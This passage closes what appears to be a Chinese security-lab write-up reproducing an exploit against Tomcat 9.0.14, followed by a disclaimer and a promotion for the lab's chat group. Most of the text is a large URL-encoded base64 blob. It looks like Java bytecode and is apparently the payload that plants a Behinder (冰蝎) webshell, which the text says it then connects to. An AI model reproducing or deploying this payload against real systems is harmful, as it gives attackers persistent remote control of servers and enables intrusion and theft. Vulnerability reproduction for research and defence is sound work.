AIkACgCLABoAjAAgAI4AKwCPADYAkQA8AJMAQACUAEQAlgBIAJEASwCTAFEAlABVAJYAWQCXAWkAAAA0AAUAIAArAR8ApAADACgAIwEgASEABAAAAFwBIgCkAAAACABUASMBJAABAAoAUgElASYAAgFrAAAABAABAP8ACQEnASgAAgFmAAAApAADAAQAAAAjKrYAdE0sEgSlABIsK7YBMLBOLLYBM02n%2F%2B67ASpZK7cBNr8AAQALABAAEQEqAAQBZwAAAA8AA%2FwABQcAREsHASr6AAgBaAAAABoABgAAAJwABQCdAAsAoAARAKEAEgCeABoApQFpAAAAIAADAAUAFQDAAKkAAgAAACMBNwArAAAAAAAjATgA%2FQABAWoAAAAMAAEABQAVAMAAwQACAWsAAAAGAAIBKgEsAAkAWABZAAIBZgAAAHYAAgADAAAAFCoruAE6TSwEtgE9LCq2AUCwTQGwAAEAAAAQABEBKgADAWcAAAAGAAFRBwEqAWgAAAAWAAUAAACsAAYArQALAK4AEQCvABIAsQFpAAAAIAADAAYACwFBAUIAAgAAABQBNwArAAAAAAAUATgA%2FQABAWsAAAAGAAIBKgEsAAkA2ADZAAIBZgAAAGYAAwAEAAAAEioruAE6Ti0EtgE9LSostgFFsQAAAAIBaAAAABIABAAAALYABgC3AAsAuAARALkBaQAAACoABAAAABIBNwArAAAAAAASAUYA%2FQABAAAAEgCBACsAAgAGAAwBQQFCAAMBawAAAAQAAQAIAAkARQBGAAIBZgAAAdUABAAHAAAApirBAESZAAoqwABEpwAHKrYAdDoEAToFGQTGADMZBccALizHABIZBCsDvQBEtgCvOgWnAAwZBCsstgCvOgWn%2F9o6BhkEtgEzOgSn%2F84ZBccAH7sBSVm7AUtZtwFMEwFOtgFSK7YBUrYBU7cBVL8ZBQS2ALUZBSrBAESZAAcBpwAEKi22AL2wOgS7AVhZuwFLWbcBTBMBWrYBUiu2AVK2AVMZBLcBXb8AAgAhAD0AQAFJAAAAhQCGAAgABAFnAAAAUQALDkMHAET9AAQHAEQHALEcCEIHAUkLIFIHALH%2FAAAABgcABAcAUQcBVgcAygcARAcAsQACBwCxBwAE%2FwAEAAQHAAQHAFEHAVYHAMoAAQcACAFoAAAAQgAQAAAAvgAUAL8AFwDAACEAwgAlAMMANADFAD0AyQBAAMcAQgDIAEkAyQBMAMsAUQDMAG0AzwBzANAAhgDRAIgA0gFpAAAAUgAIAEIABwAwAV4ABgAUAHIAwACpAAQAFwBvAV8AvwAFAIgAHgAwADEABAAAAKYBNwArAAAAAACmAWAA%2FQABAAAApgFhAVUAAgAAAKYBYwDJAAMBagAAABYAAgAUAHIAwADBAAQAAACmAWEBYgACAWwAAAACAUcACAFkAAYAAQFmAAAANwACAAAAAAARpwANALsAAlm3AWVXsQCn%2F%2FUAAAACAWcAAAAEAAIDCQFoAAAACgACAAQAGQAMABoAAA%3D%3D

随后连上冰蝎

这里目标环境是tomcat 9.0.14,至此漏洞复现完毕，感谢各位观看！

免责声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。红细胞安全实验室拥有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经作者允许，不得任意修改或者增减此文章内容， 不得以任何方式将其用于商业目的。

文末福利

团队官网：https://redcellsec.cn/，现在我们已经建立了红细胞安全实验室技术交流群，希望各位师傅能积极交流、一起学习，共同营造网络安全良好技术氛围，目前星球是完全免费的，旨在技术交流分享，目前群聊大于200人无法再通过二维码加入交流群，想进群的师傅可以公众号后台获取邀请链接，进入群聊以后私信群主或者其他师傅加入星球交流，后续会不定期在星球内部或公众号上分享一些实战干货或者实用的工具以及资讯，希望能看到更多师傅们一起来交流行业前沿技术！